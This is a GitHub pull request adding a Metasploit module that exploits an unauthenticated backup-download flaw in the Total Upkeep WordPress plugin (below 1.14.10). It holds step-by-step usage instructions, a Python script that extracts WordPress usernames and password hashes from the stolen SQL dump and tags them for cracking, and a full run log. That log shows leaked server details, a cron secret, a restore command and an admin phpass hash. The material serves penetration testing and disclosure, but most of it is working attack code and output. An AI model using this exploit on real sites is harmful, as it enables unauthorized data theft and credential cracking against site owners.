
Wordpress Plugin: 'Boldgrid-Backup' (Total Upkeep) backup download #14568

Merged (2 commits), Jan 5, 2021

Conversation

h00die (Contributor) commented Dec 30, 2020

This PR adds an exploit for Total Upkeep where the plugin exposes the name/location of backup files to unauthenticated users.
We use this to pull the backup, and attempt to find the .sql file and pull the users table.

You'll need to create a FREE account to get a serial code to make this work. Once it's registered, click the button to create a backup. All these instructions are in the docs.

Verification

  • Install the plugin and create a backup
  • Start msfconsole
  • Do: use auxiliary/scanner/http/wp_total_upkeep_downloader
  • Do: set rhosts [ip]
  • Do: run
  • You should get an archive backup. Possibly even auto hash extraction!
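The post-download step described above (find the .sql dump inside the backup archive and pull the users table) as an added, stand-alone example; this is not the module's code or anything from the PR. It assumes a mysqldump-style dump like the ones produced by the plugin's vendored ifsnop/mysqldump-php, and goes a little beyond the text: it reads the column order from CREATE TABLE so a non-default table prefix or an explicit column list still works, handles multi-row INSERTs and escaped quotes, skips oversized members, and tags each hash with its format. The archive, the dump and the hashes are constructed in-memory so it runs offline.

```python
"""Pull user_login / user_pass pairs out of the SQL dump inside a WordPress
backup zip. Added example, not the Metasploit module's implementation."""
import io
import re
import zipfile

MAX_MEMBER_BYTES = 64 * 1024 * 1024  # refuse to inflate absurdly large members (zip bomb guard)

# Constructed mysqldump-style dump. Hashes are made-up strings in phpass and
# bcrypt format, not real credentials. 'Ed; Itor' and O\'Brien exercise the
# statement splitter and the quote/escape handling.
SAMPLE_SQL = """\
-- MySQL dump (constructed for this example)
DROP TABLE IF EXISTS `wp_users`;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB;
INSERT INTO `wp_users` VALUES (1,'admin','$P$B12345678abcdefghijklmnopqrstuv','admin','Site Admin');
INSERT INTO `wp_users` VALUES (2,'editor','$P$B87654321vutsrqponmlkjihgfedcba','editor','Ed; Itor'),(3,'obrien','$2y$10$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ01234','obrien','Pat O\\'Brien');
"""

# Any table whose name ends in "users" (wp_users, but also custom prefixes);
# the optional group is an explicit column list. A ';' only ends the statement
# when it closes the line, so ';' inside a quoted value does not split it.
USERS_INSERT_RE = re.compile(
    r"INSERT INTO `(\w*users)`(?:\s*\(([^)]*)\))?\s+VALUES\s*(.*?);[ \t]*$",
    re.S | re.M,
)
ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "0": "\0"}


def table_columns(sql, table):
    """Column names, in order, from the CREATE TABLE statement for `table`."""
    m = re.search(r"CREATE TABLE `%s` \((.*?)\n\)" % re.escape(table), sql, re.S)
    if not m:
        return []
    return re.findall(r"^\s*`(\w+)`", m.group(1), re.M)


def parse_value_rows(values_text):
    """Parse "(a,'b',NULL),(...)" into lists of raw cell strings.

    Quoted strings honour backslash escapes and doubled single quotes; numbers
    and NULL are returned as their literal text.
    """
    rows, row, cur = [], [], []
    in_str = in_tuple = False
    i, n = 0, len(values_text)
    while i < n:
        c = values_text[i]
        if in_str:
            if c == "\\" and i + 1 < n:
                nxt = values_text[i + 1]
                cur.append(ESCAPES.get(nxt, nxt))
                i += 2
                continue
            if c == "'":
                if i + 1 < n and values_text[i + 1] == "'":
                    cur.append("'")
                    i += 2
                    continue
                in_str = False
            else:
                cur.append(c)
        elif c == "'":
            in_str = True
        elif c == "(":
            in_tuple, row, cur = True, [], []
        elif in_tuple and c == ",":
            row.append("".join(cur))
            cur = []
        elif in_tuple and c == ")":
            row.append("".join(cur))
            rows.append(row)
            cur, in_tuple = [], False
        elif in_tuple and not c.isspace():
            cur.append(c)
        i += 1
    return rows


def wp_users_creds(sql):
    """(user_login, user_pass) pairs from every users-table INSERT in the dump."""
    creds = []
    for table, col_list, values in USERS_INSERT_RE.findall(sql):
        cols = re.findall(r"`(\w+)`", col_list) if col_list else table_columns(sql, table)
        if "user_login" not in cols or "user_pass" not in cols:
            continue
        li, pi = cols.index("user_login"), cols.index("user_pass")
        for row in parse_value_rows(values):
            if len(row) > max(li, pi):
                creds.append((row[li], row[pi]))
    return creds


def hash_format(pw_hash):
    """Label the stored hash so it can be routed to the right cracker mode."""
    if pw_hash.startswith(("$P$", "$H$")):
        return "phpass"
    if pw_hash.startswith(("$2y$", "$2a$", "$2b$")):
        return "bcrypt"
    if re.fullmatch(r"[0-9a-f]{32}", pw_hash):
        return "md5"
    return "unknown"


def build_sample_archive():
    """Constructed stand-in for a downloaded backup zip: the site dump plus a
    vendored test fixture, mirroring the kind of .sql members a backup holds."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("wp-config.php", "<?php /* constructed placeholder */\n")
        zf.writestr("wordpress.20210104-210305.sql", SAMPLE_SQL)
        zf.writestr(
            "wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test001.src.sql",
            "CREATE TABLE `test001` (`a` int);\nINSERT INTO `test001` VALUES (1);\n",
        )
    return buf.getvalue()


def sql_members(zip_bytes):
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith(".sql")]


def extract_creds_from_archive(zip_bytes):
    """(member, login, hash, format) for every credential found in any .sql member."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in sql_members(zip_bytes):
            if zf.getinfo(name).file_size > MAX_MEMBER_BYTES:
                continue
            sql = zf.read(name).decode("utf-8", errors="replace")
            for login, pw_hash in wp_users_creds(sql):
                found.append((name, login, pw_hash, hash_format(pw_hash)))
    return found


if __name__ == "__main__":
    for member, login, pw_hash, fmt in extract_creds_from_archive(build_sample_archive()):
        print(f"{member}: {login} {pw_hash} ({fmt})")
```

Run it and the three constructed accounts come out of wordpress.20210104-210305.sql while the vendored test001 fixture is visited but yields nothing, matching the flow the module follows after the download.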

space-r7 self-assigned this Jan 4, 2021

space-r7 (Contributor) commented Jan 5, 2021

Tested, and the module works great:

msf6 > use auxiliary/scanner/http/wp_total_upkeep_downloader 
msf6 auxiliary(scanner/http/wp_total_upkeep_downloader) > options

Module options (auxiliary/scanner/http/wp_total_upkeep_downloader):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

msf6 auxiliary(scanner/http/wp_total_upkeep_downloader) > set rhost 192.168.37.139
rhost => 192.168.37.139
msf6 auxiliary(scanner/http/wp_total_upkeep_downloader) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/wp_total_upkeep_downloader) > run

[*] Checking /wp-content/plugins/boldgrid-backup/readme.txt
[*] Found version 1.14.9 in the plugin
[+] 192.168.37.139 - Vulnerable version detected
[*] 192.168.37.139 - Obtaining Server Info
[+] 192.168.37.139 - 
  gateway_interface: CGI/1.1
  http_host: 192.168.37.139
  php_sapi_name: apache2handler
  php_uname: Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
  php_version: 7.2.24-0ubuntu0.18.04.7
  server_addr: 192.168.37.139
  server_name: 192.168.37.139
  server_protocol: HTTP/1.1
  server_software: Apache/2.4.29 (Ubuntu)
  uid: 33
  username: www-data
[+] 192.168.37.139 - File saved in: /Users/space/.msf4/loot/20210105123656_default_192.168.37.139_boldgridbackup._565715.txt
[*] 192.168.37.139 - Obtaining Backup List from Cron
[+] 192.168.37.139 - 
  ABSPATH: /var/www/html/
  archive_key: 0
  cron_secret: 423158e2ae1bd9ec2d003c5439aca6a569896b6fda56b02d5dacb4c02f3456d0
  filepath: /var/www/html/wp-content/boldgrid_backup_CH0vvGczHiKU/boldgrid-backup-localhost-c542b19d-20210104-210305.zip
  siteurl: http://localhost
  site_title: test-site
  restore_cmd: php -d register_argc_argv="1" -qf "/var/www/html/wp-content/plugins/boldgrid-backup/boldgrid-backup-cron.php" mode=restore siteurl=http%3A%2F%2Flocalhost id=c542b19d secret=423158e2ae1bd9ec2d003c5439aca6a569896b6fda56b02d5dacb4c02f3456d0 archive_key=0 archive_filename=boldgrid-backup-localhost-c542b19d-20210104-210305.zip site_title=test-site
  timestamp: 1609794189
[+] 192.168.37.139 - File saved in: /Users/space/.msf4/loot/20210105123656_default_192.168.37.139_boldgridbackup._136894.txt
[*] 192.168.37.139 attempting download of wp-content/boldgrid_backup_CH0vvGczHiKU/boldgrid-backup-localhost-c542b19d-20210104-210305.zip
[+] 192.168.37.139 - Database backup (17853663 bytes) saved in: /Users/space/.msf4/loot/20210105123657_default_192.168.37.139_boldgridbackup._914095.zip
[*] 192.168.37.139 - Attempting to pull creds from wordpress.20210104-210305.sql
[+] wp_users
========

 user_login  user_pass
 ----------  ---------
 admin       $P$BAo3f6ta1bUpOfep/oIzHet/n8KCg01

[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test001.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test002.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test005.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test006.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test008.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test009.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test010.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test011.src.sql
[*] 192.168.37.139 - Attempting to pull creds from wp-content/plugins/boldgrid-backup/vendor/ifsnop/mysqldump-php/tests/test012.src.sql
[*] 192.168.37.139 - finished processing backup zip
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_total_upkeep_downloader) > creds
Credentials
===========

host  origin          service  public  private                             realm  private_type        JtR Format
----  ------          -------  ------  -------                             -----  ------------        ----------
      192.168.37.139           admin   $P$BAo3f6ta1bUpOfep/oIzHet/n8KCg01         Nonreplayable hash  phpass

space-r7 merged commit 7cab556 into rapid7:master Jan 5, 2021

space-r7 (Contributor) commented Jan 5, 2021

Release Notes

New auxiliary module auxiliary/scanner/http/wp_total_upkeep_downloader collects user creds, server info, and backup files from WordPress via a vulnerability in the Total Upkeep plugin versions below 1.14.10.

space-r7 added the rn-modules label (release notes for new or majorly enhanced modules) Jan 5, 2021
h00die deleted the boldgrid branch January 7, 2021 12:47
Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)